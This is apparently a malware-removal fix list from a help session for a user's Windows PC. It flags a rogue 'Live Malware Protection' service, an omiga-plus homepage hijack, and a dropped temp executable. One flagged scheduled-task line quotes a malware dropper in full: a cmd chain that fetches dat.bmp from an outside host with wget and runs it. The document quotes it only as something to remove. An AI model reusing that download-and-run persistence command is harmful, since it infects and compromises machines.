Task: {B7FF7EA3-EE2A-4B6A-9A52-4DDCB11E4B26} - \Jelbrus Secure Web Task No Task File <==== ATTENTION
Task: {0F7C6FE3-619C-41C9-911A-D87AB7AEEADC} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=zo5XKAtZXeP1kk82CwcY;CamStuSer;1414262298 & start cmd /R dat.bmp <==== ATTENTION
Task: {35096B11-6A10-47DA-9372-A1F5B6276119} - System32\Tasks\mcleaner => C:\Users\Piotrek\AppData\Roaming\6106.tmp.exe [2015-02-24] ()
C:\Users\Piotrek\AppData\Roaming\6106.tmp.exe
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKU\S-1-5-21-1474367243-482942620-250225594-1001\...\Run: [AdobeBridge] => [X]
URLSearchHook: [S-1-5-21-1474367243-482942620-250225594-1002] ATTENTION ==> Default URLSearchHook is missing.
BHO-x32: Safe Money Plugin

{9E6D0D23-3D72-4A94-AE1F-2D167624E3D9}

C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll No File
CHR HomePage: Default

hxxp://isearch.omiga-plus.com/?type=hp&ts=1421602252&from=cor&uid=SAMSUNGXHD252HJ_S17HJ90Q903536
CHR StartupUrls: Default

"hxxp://isearch.omiga-plus.com/?type=hp&ts=1421602252&from=cor&uid=SAMSUNGXHD252HJ_S17HJ90Q903536"
CHR DefaultSuggestURL: Default

{google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR HKLM\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho [Not Found]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
U4 klkbdflt2; \SystemRoot\system32\DRIVERS\klkbdflt2.sys [X]
2015-02-24 19:28 - 2015-02-24 19:29 - 0851968 _____ () C:\Users\Piotrek\AppData\Roaming\6106.tmp.exe
R2 Live Malware Protection; C:\Windows\mlwps.exe [239104 2015-02-24] (AV Security Software) [File not signed]
C:\Windows\mlwps.exe
EmptyTemp: